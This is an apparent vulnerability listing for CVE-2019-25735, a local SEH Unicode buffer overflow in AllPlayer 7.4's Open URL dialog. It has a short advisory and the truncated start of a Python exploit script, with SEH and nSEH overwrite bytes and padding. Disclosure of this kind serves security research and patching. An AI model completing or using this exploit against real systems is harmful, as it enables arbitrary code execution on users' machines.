CVE-2019-25735 AllPlayer 7.4 Local Buffer Overflow via SEH Unicode

AllPlayer 7.4 contains a local buffer overflow vulnerability in URL handling that allows attackers to overwrite structured exception handling pointers by supplying an excessively long URL string. Attackers can craft a malicious URL, paste it into the Open URL dialog, and trigger SEH-based code...

ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)

ALLPlayer 7.4 - Local Buffer Overflow SEH Unicode !/usr/bin/python Exploit Title: ALL Player v7.4 SEH Buffer Overflow Unicode Version: 7.4 Date: 15-08-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 head = "http://" seh = "\x0f\x47" 0x0047000f nseh = "\x61\x41" popad align junk = "\x41" 30...